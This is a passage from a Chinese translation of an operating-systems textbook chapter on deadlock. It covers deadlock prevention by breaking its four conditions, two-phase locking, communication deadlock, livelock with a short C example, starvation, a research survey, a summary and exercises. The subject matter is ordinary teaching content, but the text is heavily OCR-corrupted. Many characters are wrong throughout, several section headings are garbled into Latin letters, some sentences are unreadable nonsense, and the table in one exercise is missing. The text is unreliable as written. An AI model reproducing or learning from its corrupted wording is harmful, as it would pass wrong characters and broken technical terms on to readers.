出 它们 需要 多 少 资源 。 然 后 ， 系 统 立 即 分 配 所 需 的 全 部 资源 ， 并 且 直 到 
作业 完成 才 回收 资源 。 虽 然 这 加 重 了 编程 人 员 的 负担 ， 也 造成 了 资源 的 
浪费 ， 但 这 的 确 防止 了 死 锁 。 


另 一 种 破坏 占有 和 等 待 条 件 的 略 有 不 同 的 方案 是 ， 要 求 当 一 个 进程 
请 求 资 源 时 ， 先 暂时 释放 其 当前 占用 的 所 有 资源 ， 然 后 再 尝试 一 次 获得 





所 需 的 全 部 资源 。 


6.6.3 ”破坏 不 可 抢占 条 件 


破坏 第 三 个 条 件 《〈 不 可 抢占 ) 也 是 可 能 的 。 假 知 一 个 进程 已 分 配 到 
一 台 打 印 机 ， 且 正在 进行 打印 输出 ， 如 果 由 于 它 需 要 的 绘图 仪 无 法 获得 
而 强制 性 地 把 它 占 有 的 打印 机 抢占 挥 ， 会 引起 一 片 混乱 。 但 是 ， 一 些 资 
源 可 以 通过 虚拟 化 的 方式 来 避免 发 生 这 样 的 情况 。 假 脱 机 打印 机 回 磁 盘 
输出 ， 并 且 只 允许 打印 机 守护 进程 访问 真正 的 物理 打印 机 ， 这 种 方式 可 
以 消除 涉及 打印 机 的 死 锁 ， 然 而 却 可 能 带 来 由 磁盘 空间 导致 的 死 锁 。 但 
古 对 于 大 容量 磁盘 ， 要 消耗 完 所 有 的 磁盘 空间 一 般 是 不 可 能 的 。 











然而 ， 并 不 是 所 有 的 资源 都 可 以 进行 类 似 的 虚拟 化 。 例 如 ， 数 据 库 
中 的 记录 或 者 操作 系统 中 的 表 都 必须 被 锁定 ， 因 此 存在 出 现 死 锁 的 可 
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6.6.4 ”破坏 环 路 等 竺 条件 


现在 只 剩 下 一 个 条 件 了 。 消 除 环 路 等 竺 有 几 种 方法 。 一 种 是 保证 每 
一 个 进程 在 任何 时 刻 只 能 占用 一 个 资源 ， 如 果 要 请 求 男 外 一 个 资源 ， 它 
必须 先 释 放 第 一 个 资源 。 但 假 砂 进程 正在 把 一 个 大 文件 从 磁带 机 上 读 入 
并 送 到 打印 机 打印 ， 那 么 这 种 限制 是 不 可 接受 的 。 





男 一 种 避免 出 现 环 路 等 每 的 方法 是 将 所 有 资源 统一 编号 ， 如 图 6- 
13a 所 示 。 现 在 的 规则 是 : 进程 可 以 在 任何 时 刻 提 出 资源 请 求 ， 但 是 所 
有 请 求 必须 按照 资源 编号 的 顺序 升序 ) 提出 。 进 程 可 以 先 请 求 打 印 机 
后 请 求 磁带 机 ， 但 不 可 以 先 请 求 绘图 仪 后 请 求 打 印 机 。 


. 图 像 处 理 仪 (A) 


. 打印 机 
. 绘图 仪 
. 做 市 机 
.CD-ROM 驱 动 器 


a) b) 





图 6-13 人 对 资源 排序 编号 ; D) 一 个 资源 分 配 图 


右 按 此 规则 ， 资 源 分 配 图 中 肯定 不 会 出 现 环 。 让 我 们 看 看 在 有 两 个 
进程 的 情形 下 为 何 可 行 ， 参 看 图 6-13b。 只 有 在 A 请 求 资源 j 且 B 请 求 资源 











i 的 情况 下 会 产生 死 锁 。 假 设 i 利 j 是 不 同 的 资源 ， 它 们 会 具有 不 同 的 编 
号 。 寿 i>j， 那 么 A 不 允许 请 求 j， 因 为 这 个 编号 小 于 A 已 有 资源 的 编 
号 ; 硅 i<j， 那 么 B 不 允许 请 求 !11 因为 这 个 编写 小 于 B 已 有 资源 的 编号 。 
不 论 哪 种 情况 都 不 可 能 产生 死 锁 。 














对 于 多 于 两 个 进程 的 情况 ， 同 样 的 逻辑 依然 成 立 。 在 任何 时 候 ， 总 
有 一 个 已 分 配 的 资源 是 编号 最 高 的 。 占 用 该 资源 的 进程 不 可 能 请 求 其 他 
己 分 配 的 各 种 资源 。 它 或 者 会 执行 完毕 ， 或 者 最 坏 的 情形 是 去 请 求 编号 
更 高 的 资源 ， 而 编写 更 局 的 资源 肯定 是 可 用 的 。 最 终 ， 它 会 结束 并 释放 
所 有 资源 ， 这 时 其 他 占有 最 高 编号 资源 的 进程 也 可 以 执行 完 。 简 言 之 ， 
存在 一 种 所 有 进程 都 可 以 执行 完毕 的 情景 ， 所 以 不 会 产生 死 锁 。 











该 算法 的 一 个 变种 是 按 弃 必须 按 升 序 请 求 资源 的 限制 ， 而 仅仅 要 求 
不 允许 进程 请 求 比 当前 所 占有 资源 编号 低 的 资源 。 所 以 ， 若 一 个 进程 起 
初 请 求 9 号 和 10 号 资源 ， 而 随后 释放 两 者 ， 那 么 它 实 际 上 相当 于 从 头 开 
始 ， 所 以 没有 必要 阻止 它 现 在 请 求 1 号 资源 。 





尽管 对 资源 编号 的 方法 消除 了 死 锁 的 问题 ， 但 几乎 找 不 出 一 种 使 每 
个 人 都 满意 的 编号 次 序 。 当 资源 包括 进程 表 项 、 假 脱 机 磁盘 空间 、 加 锁 
的 数据 库 记录 及 其 他 抽象 资源 时 ， 潜 在 的 资源 及 各 种 不 同 用 途 的 数目 会 
变 得 很 大 ， 以 至 于 使 编号 方法 根本 无 法 使 用 。 





死 锁 预 防 的 各 种 方法 如 图 6-14 所 示 。 






不 可 抢占 抢占 资源 


环 路 等 竺 对 资源 按 序 编号 


图 6-14 死 锁 预防 方法 汇总 







6.7 其 他 问题 


在 本 节 中 ， 我 们 会 讨论 一 些 和 死 锁 相关 的 问题 ， 包 括 两 阶段 加 锁 、 
通信 和 死 锁 、 活 锁 和 饥饿 。 


6.7.1 两 阶段 加 锁 


虽然 在 一 般 情 况 下 避免 死 锁 和 预防 死 锁 并 不 是 很 有 希望 ， 但 是 在 一 
些 特殊 的 应 用 方面 ， 有 很 多 日 越 的 专用 算法 。 例 如 ， 在 很 多 数据 库 系 统 
中 ， 一 个 经 第 发 生 的 操作 是 请 求 锁 住 一 些 记 录 ， 然 后 更 新 所 有 锁 住 的 记 
录 。 当 同时 有 多 个 进程 运行 时 ， 就 有 出 现 死 锁 的 危险 。 





常用 的 方法 是 两 阶段 加 锁 (two-phase locking) 。 在 第 一 阶段 ， 进 
程 试图 对 所 有 所 需 的 记录 进行 加 锁 ， 一 次 锁 一 个 记录 。 如 有 果 第 一 阶段 加 
锁 成 功 ， 束 开始 第 二 阶段 ， 完 成 更 新 然后 释放 锁 。 在 第 一 阶段 并 没有 做 
实际 的 工作 。 














如 果 在 第 一 阶段 某 个 进程 需要 的 记录 已 经 被 加 锁 ， 那 么 该 进程 释放 
它 所 有 加 锁 的 记录 ， 然 后 重新 开始 第 一 阶段 。 从 茶 种 意义 上 说 ， 这 种 方 
法 类 似 于 提前 或 者 至 少 是 未 实施 一 些 不 可 逆 的 操作 之 前 请 求 所 有 资源 。 
在 两 阶段 加 锁 的 一 些 版 本 中 ， 如 果 在 第 一 阶段 遇 到 了 已 加 锁 的 记录 ， 并 
不 会 释放 锁 然 后 重新 开始 ， 这 残 可 能 产生 死 锁 。 


不 过 ， 在 一 般 意 义 下 ， 这 种 策略 并 不 通用 。 例 如 ， 在 实时 系统 和 进 
程控 制 系统 中 ， 由 于 一 个 进程 缺少 一 个 可 用 资源 就 半途 中 断 它 ， 并 重新 
开始 该 进程 ， 这 是 不 可 接受 的 。 如 采 一 个 进程 已 经 在 网 络 上 读 写 消息 、 
更 新 文件 或 从 事 任 何不 能 安全 地 重复 做 的 事 ， 那 么 重新 运行 进程 也 是 不 
可 接受 的 。 只 有 当 程 序 员 仔细 地 安排 了 程序 ， 使 得 在 第 一 阶段 程序 可 以 
在 任意 一 点 停 下 来 ， 并 重新 开始 而 不 会 产生 错误 ， 这 时 这 个 算法 才 可 
行 。 但 很 多 应 用 并 不 能 按 这 种 方式 来 设计 。 























6.7.2 BR JEM 


到 目前 为 止 ， 我 们 所 有 的 工作 都 着 眼 于 资源 死 锁 。 一 个 进程 需要 使 
用 另外 一 个 进程 拥有 的 资源 ， 因 此 必须 等 待 直至 该 进程 停止 使 用 这 些 资 
源 。 有 时 资源 是 硬件 或 者 软件 ， 比 如 说 CD-ROM 驱 动 器 或 者 数据 库 记 
录 ， 但 是 有 时 它们 更 加 抽象 。 在 图 6-2 中 ， 可 以 看 到 当 资 源 互 斥 时 发 生 
的 资源 死 锁 。 这 比 CD-ROM 了 驱动 絮 更 抽象 一 点 ， 但 是 在 这 个 例子 中 ， 每 
个 进程 都 成 功 调用 一 个 资源 《〈 互 斥 锁 之 一 ) 而 且 死 锁 的 进程 尝试 去 调用 
另外 的 资源 〈 另 一 个 互 斥 锁 ) 。 这 种 情况 是 典型 的 资源 死 锁 。 














然而 ， 正 如 我 们 在 本 章 开始 提 到 的 ， 资 源 死 锁 是 最 普 损 的 一 种 类 
型 ， 但 不 是 惟一 的 一 种 。 另 一 种 死 锁 发 生 在 通信 系统 中 《比如 说 网 
络 ) ， 即 两 个 或 两 个 以 上 进程 利用 发 送信 息 来 通信 时 。 一 种 普 过 的 情形 
征 进程 A 同 进程 B 发 送 请 求 信 息 ， 然 后 阻塞 直至 B 回 复 。 假 设 请 求 信息 丢 
失 ，A 将 阻 旱 以 等 竺 回复 ， 而 B 会 阻 竖 等 竺 一 个 同 其 发 送 命 令 的 请 求 ， 
因此 发 生死 锁 。 











仅仅 如 此 并 非 经 典 的 资源 死 锁 。A 没 有 占有 B 所 需 的 资源 ， 反 之 亦 
然 。 事 实 上 ， 并 没有 完全 可 见 的 资源 。 但 是 ， 根 据 标 准 的 定义 ， 在 一 系 
列 进程 中 ， 每 个 进程 因为 等 竺 另外 一 个 进程 引发 的 事件 而 产生 阻塞 ， 这 
就 是 一 种 死 锁 。 相 比 于 更 加 向 见 的 资源 死 锁 ， 我 们 把 上 面 这 种 情况 叫做 


通信 死 锁 (communication deadlock) 。 


通信 和 死 锁 不 能 通过 对 资源 排序 〈 因 为 没有 ) 或 者 通过 仔细 地 安排 调 
度 来 避免 《因为 任何 时 刻 的 请 求 都 是 不 被 允许 延迟 的 ) 。 幸 运 的 是 ， 田 
外 一 种 技术 通常 可 以 用 来 中 断 通 信和 死 锁 : 超时 。 在 大 多 数 网 络 通信 系统 
中 ， 只 要 一 个 信息 航 发 送 至 一 个 特定 的 地 方 ， 并 等 竺 其 返回 一 个 预期 的 
回复 ， 发 送 者 就 同时 局 动 计 时 器 。 夺 计时 器 在 回复 到 达 前 计时 就 停止 
了 ， 则 信息 的 发 送 者 可 以 认定 信息 已 经 丢失 ， 并 重新 发 送 〈 如 果 需 要 
则 一 直 重 复 ) 。 通 过 这 种 方式 ， 可 以 避免 死 锁 。 














当然 ， 如 果 原 始 信息 没有 丢失 ， 而 仅仅 是 回复 延 时 ， 接 收 者 可 能 收 
到 两 次 或 者 更 多 次 信息 ， 甚 至 导致 意 想 不 到 的 结 末 。 想 象 电 子 银行 系统 
中 包含 付 球 说 明 的 信息 。 很 明显 ， 不 应 该 仅仅 因为 网 速 绥 慢 或 者 超时 设 
ERR, MES HIT) 多 次 。 应 该 将 通信 规则 一 一 通常 称 为 协议 
(protocol) 一 一 设计 为 让 所 有 事情 部 正确 ， 这 是 一 个 复杂 的 课题 ， 超 
出 了 本 书 的 范围 。 对 网 络 协 议 感 兴趣 的 读者 可 以 参考 作者 的 男 外 一 本 书 


— 《Computer Networks) (Tanenbaum, 2003) . 











并 非 所 有 在 通信 系统 或 者 网 络 发 生 的 死 锁 都 是 通信 死 锁 。 资 源 死 锁 
也 会 有 发生， 如 图 6-15 中 的 网 络 。 这 张 图 是 因特网 的 简化 图 〈 极 其 简 
化 ) 。 因 特 网 由 两 类 计算 机 组 成 : 主机 和 路 由 堪 。 主 机 Chost) 是 一 
用 户 计算 机 ， 可 以 是 某 人 家 里 的 PC 机 、 公 司 的 个 人 计算 机 ， 也 可 能 是 
一 个 共 圣 服务 器 。 主 机 由 人 来 操作 。 路 由 器 (router) 是 专用 的 通信 计 


算 机 ， 将 数据 包 从 源 发 送 至 目的 地 。 每 台 主 机 都 连接 一 个 或 更 多 的 路 由 
器 ， 可 以 用 一 条 DSL 线 、 有 线 电视 连接 、 局 域 网 、 拨 号 线路 、 无 线 网 
络 、 光 纤 等 来 连接 。 


Bel} ait EA HH A 





图 6-15 一 个 网 络 中 的 资源 死 锁 


当 一 个 数据 包 从 一 个 主机 进入 路 由 器 时 ， 它 被 放 入 一 个 缓冲 器 中 ， 
然后 传输 到 另外 一 个 路 由 堪 ， 再 到 另 一 个 ， 直 至 目的 地 。 这 些 缓冲 器 都 
是 资源 并 且 数 目 有 限 。 在 图 6-15 中 ， 每 个 路 由 喜 都 有 8 个 缓冲 右 《〈 实 际 
应 用 中 有 数 以 百 万 计 ， 但 是 并 不 能 改变 潜在 死 锁 的 本 质 ， 只 是 改变 了 它 
的 频率 ) 。 假 设 路 由 器 A 的 所 有 数据 包 需 要 发 送 到 B，B 的 所 有 数据 包 需 
要 发 送 到 C，C 的 所 有 数据 包 需 要 发 送 到 D， 然 后 D 的 所 有 数据 包 需 要 发 
送 到 A。 那 么 没有 数据 包 可 以 移动 ， 因 为 在 另 一 端 没 有 缓冲 器 。 这 就 是 


一 个 典型 的 资源 死 锁 ， 尽 管 它 发 生 在 通信 系统 中 。 


6.7.3 ji 


在 东 种 情形 下 ， 轮 询 〈 忙 等 待 ) 可 用 于 进入 临界 区 或 存 取 资 源 。 采 
用 这 一 策略 的 主要 原因 是 ， 相 比 所 做 的 工作 而 言 ， 互 斥 的 时 间 很 短 而 挂 
起 等 待 的 时 间 开销 很 大 。 考 虑 一 个 原 语 ， 通 过 该 原 语 ， 调 用 进程 测试 一 
个 互 斥 信号 量 ， 然 后 或 者 得 到 该 信号 量 或 者 返回 失败 信息 。 如 网 2-26 中 
的 例子 所 示 。 





现在 假设 有 一 对 进程 使 用 两 种 资源 ， 如 图 6-16 所 示 。 每 个 进程 需要 
两 种 资源 ， 它 们 利用 轮 询 原 语 enter_region 去 尝试 取得 必要 的 锁 ， 如 果 尝 
试 失败 ， 则 该 进程 继续 尝试 。 在 图 6-16 中 ， 如 果 进 程 A 先 运行 并 得 到 资 
源 1， 然 后 进程 2 运行 并 得 到 资源 2， 以 后 不 管 哪 一 个 进程 运行 ， 都 不 会 
有 任何 进展 ， 但 是 哪 一 个 进程 也 没有 被 阻塞 。 结 果 是 两 个 进程 总 是 一 再 
消耗 完 分 配给 它们 的 CPU 配额 ， 但 是 没有 进展 也 没有 阻 蹇 。 因 此 ， 没 有 
出 现 死 锁 现象 〈 因 为 没有 进程 阻塞 ) ， 但 是 从 现象 上 看 好 像 死 锁 发 生 


了 ， 这 就 是 活 锁 (livelock) 。 


void process_A(void) { 
enter_region(&resource _ 1); 
enter_region(&resource _ 2); 
use_both_resources( ); 
leave_region(&resource _ 2); 
leave_region(&resource _ 1); 


} 


void process_B(void) { 
enter_region(&resource _ 2); 
enter_region(&resource _ 1); 
use_both_resources( ); 
leave_region(&resource _ 1); 
leave_region(&resource _ 2); 





图 616 忙 等 待 可 能 导致 活 锁 


活 锁 也 经 常 出 人 意料 地 产生 。 在 一 些 系统 中 ， 进 程 表 中 容纳 的 进程 
数 决定 了 系统 允许 的 最 大 进程 数量 ， 因 此 进程 表 属 于 有 限 的 资源 。 如 果 
由 于 进程 表 满 了 而 导致 一 次 fork 运 行 失败 ， 那 么 一 个 合理 的 方法 是 : 1% 
程序 等 竺 一段 随机 长 的 时 间 ， 然 后 再 次 党 试 运行 fork。 























现在 假设 一 个 UNIX 系 统 有 100 个 进程 槽 ，10 个 程序 正在 运行 ， 每 个 
程序 需要 创建 12 个 〈 子 ) 进程。 在 每 个 进程 创建 了 9 个 进程 后 ，10 个 源 
进程 和 90 个 新 的 进程 束 已 经 占 满 了 进程 表 。10 个 源 进程 此 时 便 进入 了 死 
锁 一 一 不 停 地 进行 分 文 循环 和 运行 失败 。 发 生 这 种 情况 的 可 能 性 是 极 小 








的 ， 但 是 ， 这 是 可 能 发 生 的 ! 我 们 是 售 应 该 放弃 进程 以 及 fork 调 用 来 消 


除 这 个 问题 呢 ? 





限制 打开 文件 的 最 大 数量 与 限制 索引 节点 表 的 大 小 的 方式 很 相像 ， 
因此 ， 当 它 被 完全 占用 的 时 候 ， 也 会 出 现 相 似 的 问题 。 硬 盘 上 的 交换 空 
间 是 男 一 个 有 限 的 资源 。 事 实 上 ， 几 了 乎 操作 系统 中 的 每 种 表 痢 代表 了 一 
种 有 限 的 资源 。 如 果 有 n 个 进程 ， 每 个 进程 都 申请 了 1m 的 资源 ， 然 后 每 
一 个 义 试 图 申请 更 多 的 资源 ， 这 种 情况 下 我 们 是 不 是 应 该 茶 挥 所 有 的 
Ne? 也 许 这 不 是 一 个 好 主意 。 


大 多 数 的 操作 系统 (包括 UNIX 和 Windows〉 都 忽略 了 一 个 问题 ， 
即 比 起 限制 所 有 用 户 去 使 用 一 个 进程 、 一 个 打开 的 文件 或 任意 一 种 资源 
来 说 ， 大 多 数 用 户 可 能 更 愿意 选择 一 次 偶然 的 活 锁 〈 或 者 甚至 是 死 
D) 。 如 果 这 些 问题 能 够 免费 消除 ， 那 就 不 会 有 争论 。 但 问题 是 代价 非 
常 蜗 ， 因 而 几乎 都 是 给 进程 加 上 不 便 的 限制 来 处 理 。 因 此 我 们 面 对 的 问 
题 是 从 便捷 性 和 正确 性 中 做 出 取舍 ， 以 及 一 系列 关于 哪个 更 重要 、 对 谁 
更 重要 的 争论 。 





值得 一 提 的 是 ， 一 些 人 对 饥饿 《缺乏 资源 ) 和 死 锁 并 不 作 区 分 ， 因 
为 在 两 种 情况 下 都 没有 下 一 步 操作 了 。 还 有 些 人 认为 它们 从 根本 上 不 
同 ， 因 为 可 以 很 轻易 地 编写 一 个 进程 ， 让 它 做 某 个 操作 nm 次， 并 且 如 采 
它们 都 失败 了 ， 再 试 试 其 他 的 残 可 以 了 。 一 个 阻 野 的 进程 就 没有 那样 的 
选择 了 。 





6.7.4 Hlth 

BAERE BL SE Bs AA LA 7 fe SE LK (starvation) 。 在 动态 运 
行 的 系统 中 ， 在 任何 时 刻 都 可 能 请 求 资 源 。 这 就 需要 一 些 策 略 来 决定 在 
什么 时 候 谁 获得 什么 资源 。 虽 然 这 个 策略 表面 上 很 有 道理 ， 但 依然 有 可 
能 使 一 些 进 程 永远 得 不 到 服务 ， 虽 然 它们 并 不 是 死 锁 进程 。 


作为 一 个 例子 ， 考 虑 打印 机 分 配 。 设 想 系统 采用 某 种 算法 来 保证 打 
印 机 分 配 不 产生 死 锁 。 现 在 假设 若干 进程 同时 都 请 求 打印 机 ， 完 竟 哪 一 
个 进程 能 获得 打印 机 呢 ? 


一 个 可 能 的 分 配方 案 是 把 打印 机 分 配给 打印 最 小 文件 的 进程 《假设 
这 个 信息 可 知 ) 。 这 个 方法 让 尽量 多 的 顾客 满意 ， 并 且 看 起 来 很 公平 。 
我 们 考虑 下 面 的 情况 : 在 一 个 繁忙 的 系统 中 ， 有 一 个 进程 有 一 个 很 大 的 
文件 要 打印 ， 每 当 打印 机 空 亲 ， 系 统 纵 观 所 有 进程 ， 并 把 打印 机 分 配给 
打印 最 小 文件 的 进程 。 如 宁 存 在 一 个 固定 的 进程 流 ， 其 中 的 进程 都 是 只 
打印 小 文件 ， 那 么 ， 要 打印 大 文件 的 进程 永远 也 得 不 到 打印 机 。 很 简 
单 ， 它 会 “饥饿 而 死 ”《〈 无 限制 地 推 后 ， 尽 管 它 没有 被 阻 压 ) 。 








饥饿 可 以 通过 先 来 先 服务 资源 分 配 策 略 来 避免 。 在 这 种 机 制 下 ， 等 
待 最 久 的 进程 会 是 下 一 个 锐 调 度 的 进程 。 随 着 时 间 的 推移 ， 所 有 进程 都 
会 变 成 最 “ 老 ” 的 ， 因 而 ， 最 终 能 够 获得 资源 而 完成 。 


6.8 ” 有关 死 锁 的 研究 


死 锁 在 操作 系统 发 展 的 早期 就 作为 一 个 课题 被 详细 地 研究 过 。 死 锁 
的 检测 是 一 个 经 典 的 图 论 问 题 ， 任 何 对 数学 有 兴趣 的 研究 生 都 可 以 在 其 
上 做 3 一 4 年 的 研究 。 所 有 相关 的 算法 都 已 经 经 过 了 反复 修正 ， 但 每 次 修 
正 总 是 得 到 更 古怪 、 更 不 现实 的 算法 。 大 部 分 工作 已 经 结束 了 ， 但 是 仍 
然 有 很 多 关于 死 锁 各 方面 内 容 的 论文 发 表 。 这 些 论 文 包 括 由 于 错误 使 用 
锁 和 信和 号 量 而 导致 的 死 锁 的 运行 时 间 检 测 CA garwal fil Stoller,2006; 
Bensalem 等 人 ,2006) ; 在 Java 线 程 中 预防 死 锁 〈Permandia 等 人 ， 
2007; Williams 等 人 ，2005) ; 处 理 网 络 上 的 死 锁 (Jayasimha,2003; 
Karol 等 人 ，2003; Schafer 等 人 ，2005) ; 数据 流 系 统 中 的 死 锁 建 模 
(ZhoufllLee,2006) ; 检测 动态 死 锁 〈Li 等 人 ，2005) 。 
Levine (2003a,2003b) 比较 了 文献 中 关于 死 锁 各 种 不 同 的 《经 名 相 政 盾 
的 ) 定义 ， 从 而 提出 了 一 个 分 类 方案 。 她 也 从 另外 的 角度 分 析 了 关于 预 
防 死 锁 和 避免 死 锁 的 区 别 (Levine，2005) 。 而 死 锁 的 恢复 也 是 一 个 正 
在 研究 的 问题 (David 等 人 ，2007) 。 











然而 ， 还 有 一 些 ( 理 论 ) 研究 是 关于 分 布 式 死 锁 检测 的 ， 我 们 在 这 
里 不 做 表述 ， 因 为 它 超出 了 本 书 的 范围 ， 而 且 这 些 研究 在 实际 系统 中 的 
应 用 非常 少 ， 似 乎 只 是 为 了 让 一 些 图 论 家 有 事 可 做 里 了 。 


6.9 ”小 结 


死 锁 是 任何 操作 系统 的 潜在 问题 。 在 一 组 进程 中 ， 每 个 进程 都 因 等 
待 由 该 组 进程 中 的 男 一 进程 所 占有 的 资源 而 导致 了 月 窒 ， 死 锁 就 发 生 了 。 
这 种 情况 会 使 所 有 的 进程 都 处 于 无 限 等 得 的 状态 。 一 般 来 讲 ， 这 是 进程 
一 直 等 待 被 其 他 进程 占用 的 人 条 些 资 源 释 放 的 事件 。 死 锁 的 妨 外 一 种 可 能 
的 情况 是 一 组 通信 进程 都 在 等 竺 一 个 消 轧 ， 而 通信 信道 却 是 空 的 ， 并 且 
也 没有 采用 超时 机 制 。 





通过 跟踪 哪 一 个 状态 是 安全 状态 ， 哪 一 个 状态 是 不 安全 状态 ， 可 以 
避免 死 锁 。 安 全 状态 就 是 这 样 一 个 状态 : 存在 一 个 事件 序列 ， 保 证 所 有 
的 进程 都 能 完成 。 不 安全 状态 就 不 存在 这 样 的 保证 。 银 行家 算法 可 以 通 
过 拒绝 可 能 引起 不 安全 状态 的 请 求 来 避免 死 锁 。 








也 可 以 在 设计 系统 时 就 不 允许 死 锁 发 生 ， 从 而 在 系统 结构 上 预防 死 
锁 的 发 生 。 例 如 ， 只 允许 进程 在 任何 时 刻 最 多 占有 一 个 资源 ， 这 惑 破 坏 
了 循环 等 竺 环 路 。 也 可 以 将 所 有 的 资源 编号 ， 规 定 进 程 按 严 格 的 升序 请 
求 资源 ， 这 样 也 能 预防 死 锁 。 





资源 死 锁 并 不 是 惟一 的 一 种 死 锁 。 尽 管 我 们 可 以 通过 设置 适当 的 超 
时 机 制 来 解决 通信 和 死 锁 ， 但 它 依然 是 茶 些 系统 中 淤 在 的 问题 。 


活 锁 和 和 死 锁 的 问题 有 些 相 似 ， 那 惑 是 它 也 可 以 停止 所 有 的 转发 进 


程 ， 但 是 二 者 在 技术 上 不 同 ， 由 于 活 锁 包含 了 一 些 实际 上 并 没有 锁 住 的 
进程 ， 因 此 可 以 通过 先 来 先 服务 的 分 配 策略 来 避免 饥饿 。 


习题 
1. 给 出 一 个 由 策略 产生 的 死 锁 的 例子 。 


2. 学 生 们 在 机 房 的 个 人 计算 机 上 将 自己 要 打印 的 文件 发 送 给 服务 
人 虱 ， 服 务 占 会 将 这 些 文 件 暂 存在 它 的 硬盘 上 。 如 果 服 务 占 磁 副 空间 有 
限 ， 那 么 ， 在 什么 情况 下 会 产生 死 锁 ? 这 样 的 死 锁 应 该 怎样 避免 ? 


3. 在 图 6-1 中 ， 资 源 释 放 的 顺序 与 获得 的 顺序 相反 ， 以 其 他 的 顺序 释 
放 资 源 能 否 得 到 同样 的 结果 ? 


4 一 个 资源 死 锁 的 发 生 有 四 个 必要 条 件 ( 互 斥 使 用 资源 、 占 有 和 等 
符 资 源 、 不 可 抢占 资源 和 环 路 等 待 资源) 。 举 一 个 例子 说 明 这 些 条 件 对 
于 一 个 资源 死 锁 的 发 生 不 是 充分 的 。 何 时 这 些 条 件 对 一 个 资源 死 锁 的 发 
生 是 充分 条 件 ? 

5. 图 6-3 给 出 了 资源 分 配 图 的 概念 ， 试 问 是 否 存在 不 合理 的 资源 分 配 
图 ， 即 资源 分 配 图 在 结构 上 违反 了 使 用 资源 的 模型 ? 如 果 存 在 ， 请 给 出 
er 





6. 假 设 一 个 系统 中 存在 一 个 资源 死 锁 。 举 一 个 例子 说 明 死 锁 的 进程 
集合 中 可 能 包括 了 不 在 相应 的 资源 分 配 图 中 循环 链 中 的 进程 。 


7. 驶 马 算 法 中 提 到 了 填充 进程 表 表 项 或 者 其 他 系统 表 的 可 能 。 能 人 否 


给 出 一 种 能 够 使 系统 管理 员 从 这 种 状况 下 恢复 系统 的 方法 ? 


8. 解 释 系统 是 如 何 从 前 面 问题 的 死 锁 中 恢复 的 ， 使 用 a) 抢 占 ; bE 
FR; 器 终 止 进程 。 


9. 假 设 在 图 6-6 中 ， 对 某 个 1， 有 Ci +Ri >E ， 这 意味 着 什么 ? 


10. 请 说 明 表 6-8 中 的 模型 与 6.5.2 市 描述 的 安全 状态 和 不 安全 状态 有 
什么 主要 的 差异 。 差 异 带 来 的 后 果 是 什么 ? 





11. 图 6-8 所 示 的 资源 轨迹 模式 是 人 否 可 用 来 说 明 三 个 进程 和 三 个 资源 
的 死 锁 问题 ? 如 果 可 以 ， 它 是 怎样 说 明 的 ?如 果 不 可 以 ， 请 解释 为 什 


IA 


12. 理 论 上 ， 资 源 轨迹 图 可 以 用 于 避免 死 锁 。 通 过 合理 的 调度 ， 操 
作 系 统 可 避免 进入 不 安全 区 域 。 请 列举 一 个 在 实际 运用 这 种 方法 时 会 带 
来 的 问题 。 


13. 一 个 系统 是 否 可 能 处 于 既 非 死 锁 也 不 安全 的 状态 ? 如 宁可 以 ， 
举 出 例子 ;， 如果 不 可 以 ， 请 证 明 所 有 状态 只 能 处 于 死 锁 或 安全 两 种 状态 
a 


14. 考 处 一 个 使 用 银行 家 算法 避免 死 锁 的 系统 。 录 个 时 刻 一 个 进程 P 
请 求 资源 R， 但 即使 R 当 前 可 用 这 个 请 求 也 被 拒绝 了 。 如 果 系 统 分 配 R 给 
P， 是 否 意 味 着 系统 将 会 死 锁 ? 


15. 银 行家 算法 的 一 个 主要 限制 就 是 需要 知道 所 有 进程 的 最 大 资源 
需求 的 信息 。 有 没有 可 能 设计 一 个 不 需要 这 些 信息 而 避免 死 锁 的 算法 ? 
解释 你 的 方法 。 








16. 仔 细 考 察 图 6-11b， 如 果 D 再 多 请 求 1 个 单位 ， 会 导致 安全 状态 还 
古 不 安全 状态 ?如 果 换 成 C 提 出 同样 请 求 ， 情 形 会 怎样 ? 





17. 某 一 系统 有 两 个 进程 和 三 个 相同 的 资源 。 每 个 进程 最 多 需要 两 
个 资源 。 这 种 情况 下 有 没有 可 能 发 生死 锁 ? 为 什么 ? 





18. 再 考虑 上 一 个 问题 ， 但 现在 有 p 个 进程 ， 每 个 进程 最 多 需要 m 个 
资源 ， 并 且 有 Fr 个 资源 可 用 。 什 么 样 的 条 件 可 以 保证 死 锁 不 会 发 生 ”? 











19. 假 设 图 6-12 中 的 进程 A 请 求 最 后 一 台 人 磁带 机 ， 这 一 操作 会 引起 死 
锁 吗 ? 

20. 一 个 计算 机 有 6 台 磁 带 机 ， 由 nm 个 进程 竞争 使 用 ， 每 个 进程 可 能 
需要 两 从 磁带 机 ， 那 么 n 是 多 少时 系统 才 没 有 死 锁 的 危险 ? 





21. 银 行家 算法 在 一 个 有 m 个 资源 类 型 和 n 个 进程 的 系统 中 运行 。 当 
m 和 和 n 都 很 大 时 ， 为 检查 状态 是 否 安全 而 进行 的 操作 次 数 正比 于 ma nb 。 
a 和 b 的 值 是 多 少 ? 





22. 一 个 系统 有 4 个 进程 和 5 个 可 分 配 资源 ， 当 前 分 配 和 最 大 需求 如 
F: 


己 分 配 资源 | 最 大 需求 量 | 可 用 资源 





在 保持 该 状态 是 安全 状态 ，x 的 最 小 值 是 多 少 ? 


23. 一 个 消除 环 路 等 竺 的 方法 是 用 规则 说 明 一 个 进程 在 任意 时 刻 只 
能 得 到 一 个 资产。 举例 说 明 在 很 多 情况 下 这 个 限制 是 不 可 接受 的 。 











24. 两 个 进程 A 和 和 B， 每 个 进程 都 需要 数据 库 中 的 3 个 记录 1、2、3。 
如 果 A 和 B 都 以 [、2、3 的 次 序 请 求 ， 将 不 会 发 生死 锁 。 但 是 如 有 果 B 以 3、 
2、1 的 次 序 请 求 ， 那 么 死 锁 就 有 可 能 会 发 生 。 对 于 这 3 种 资源 ， 每 个 进 
程 共 有 3! (HG) 种 次 序 请 求 ， 这 些 组 合 中 有 多 大 的 可 能 可 以 保证 不 会 
发 生死 锁 ? 








25. 一 个 使 用 信箱 的 分 布 式 系 统 有 两 条 IPC 原 语 : send 和 receive。 
receive 原 语 用 于 指定 从 哪个 进程 接收 消息 ， 并 且 如 果 指 定 的 进程 没有 可 
用 消息 ， 即 使 有 从 其 他 进程 发 来 的 消息 ， 该 进程 也 等 等 。 不 存在 共享 资 
源 ， 但 是 进程 由 于 其 他 原因 需要 经 常 通信 。 死 锁 会 产生 吗 ? 请 讨论 这 一 


问题 。 








26. 在 一 个 电子 资金 转账 系统 中 ， 有 很 多 相同 进程 按 如 下 方式 工 
